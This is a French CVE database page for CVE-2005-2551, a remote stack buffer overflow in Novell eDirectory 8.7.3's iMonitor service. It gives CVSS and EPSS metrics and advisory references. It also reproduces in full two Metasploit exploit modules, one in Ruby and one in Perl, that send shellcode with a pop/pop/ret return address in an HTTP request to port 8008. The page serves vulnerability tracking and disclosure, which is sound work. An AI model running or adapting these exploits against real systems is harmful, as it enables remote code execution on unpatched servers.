CVE-2005-2551 : Détail

CVE-2005-2551

72.56%V4
Network
2005-08-12
02h00 +00:00
2005-11-30
09h00 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Buffer overflow in dhost.exe in iMonitor for Novell eDirectory 8.7.3 on Windows allows attackers to cause a denial of service (crash) and obtain access to files via unknown vectors.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 16769

Date de publication : 2010-07-12 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # $Id: edirectory_imonitor.rb 9812 2010-07-13 22:11:40Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /DHost\//, /HttpStk\// ] } # custom port include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'eDirectory 8.7.3 iMonitor Remote Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in eDirectory 8.7.3 iMonitor service. This vulnerability was discovered by Peter Winter-Smith of NGSSoftware. NOTE: repeated exploitation attempts may cause eDirectory to crash. It does not restart automatically in a default installation. }, 'Author' => [ 'anonymous', 'Matt Olney <scacynwrig@yahoo.com>' ], 'License' => BSD_LICENSE, 'Version' => '$Revision: 9812 $', 'References' => [ [ 'CVE', '2005-2551'], [ 'OSVDB', '18703'], [ 'BID', '14548'], ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'Space' => 4150, 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x26\x3d\x2b\x3f\x3a\x3b\x2d\x2c\x2f\x23\x2e\x5c\x30", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Windows (ALL) - eDirectory 8.7.3 iMonitor', { 'Ret' => 0x63501f15 } ], # pop/pop/ret ], 'DisclosureDate' => 'Aug 11 2005', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(8008) ], self.class) end def exploit c = connect # pop/pop/ret in ndsimon.dlm on our jump to our shellcode uri = '/nds/' + payload.encoded + make_nops(2) + "\xeb\x04" + [target.ret].pack('V') uri << "\xe9\xbd\xef\xff\xff" uri << "B" * 0xD0 res = c.send_request(c.request_raw({ 'uri' => uri })) select(nil,nil,nil,4) handler disconnect end end
Exploit Database EDB-ID : 1152

Date de publication : 2005-08-11 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # This file is part of the Metasploit Framework and may be redistributed # according to the licenses defined in the Authors field below. In the # case of an unknown or missing license, this file defaults to the same # license as the core Framework (dual GPLv2 and Artistic). The latest # version of the Framework can always be obtained from metasploit.com. ## package Msf::Exploit::edirectory_imonitor; use strict; use base "Msf::Exploit"; use Pex::Text; my $advanced = { }; my $info = { 'Name' => 'eDirectory 8.7.3 iMonitor Remote Stack Overflow', 'Version' => '$Revision: 1.2 $', 'Authors' => [ 'anonymous' ], 'Arch' => [ 'x86' ], 'OS' => [ 'win32', 'winnt', 'winxp', 'win2k', 'win2003' ], 'Priv' => 1, 'AutoOpts' => { 'EXITFUNC' => 'thread' }, 'UserOpts' => { 'RHOST' => [1, 'ADDR', 'The target address'], 'RPORT' => [1, 'PORT', 'The target port', 8008 ], 'VHOST' => [0, 'DATA', 'The virtual host name of the server'], 'SSL' => [0, 'BOOL', 'Use SSL'], }, 'Payload' => { 'Space' => 0x1036, 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\$%", 'Keys' => ['+ws2ord'], }, 'Description' => Pex::Text::Freeform(qq{ This module exploits a stack overflow in eDirectory 8.7.3 iMonitor service. This vulnerability was discovered by Peter Winter-Smith of NGSSoftware. }), 'Refs' => [ ['OSVDB', '18703'], ['CVE', '2005-2551'], ['BID', '14548'], ], 'Targets' => [ [ 'Windows (ALL) - eDirectory 8.7.3 iMonitor', 0x63501f15] # pop/pop/ret ], 'Keys' => ['imonitor'], }; sub new { my $class = shift; my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); return($self); } sub Exploit { my $self = shift; my $target_host = $self->GetVar('RHOST'); my $target_port = $self->GetVar('RPORT'); my $target_idx = $self->GetVar('TARGET'); my $shellcode = $self->GetVar('EncodedPayload')->Payload; my $target = $self->Targets->[$target_idx]; $self->PrintLine( "[*] Attempting to exploit " . $target->[0] ); my $s = Msf::Socket::Tcp->new( 'PeerAddr' => $target_host, 'PeerPort' => $target_port, 'SSL' => $self->GetVar('SSL'), ); if ( $s->IsError ) { $self->PrintLine( '[*] Error creating socket: ' . $s->GetError ); return; } # pop/pop/ret in ndsimon.dlm on our jump to our shellcode my $req = $shellcode . "\x90\x90\xeb\x04" . pack('V', $target->[1]) . "\xe9\xbd\xef\xff\xff" . ("B" x 0xD0); my $request = "GET /nds/$req HTTP/1.1\r\n". "Accept: */*\r\n". "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n". "Host: $target_host:$target_port\r\n". "Connection: Close\r\n". "\r\n"; $s->Send($request); $self->PrintLine("[*] Overflow request sent, sleeping for four seconds"); select(undef, undef, undef, 4); $self->Handler($s); return; } 1; # milw0rm.com [2005-08-12]

Products Mentioned

Configuraton 0

Novell>>Edirectory >> Version 8.7.3

Références

http://secunia.com/advisories/16393
Tags : third-party-advisory, x_refsource_SECUNIA
http://securitytracker.com/id?1014661
Tags : vdb-entry, x_refsource_SECTRACK
http://www.securityfocus.com/bid/14548
Tags : vdb-entry, x_refsource_BID
http://www.kb.cert.org/vuls/id/213165
Tags : third-party-advisory, x_refsource_CERT-VN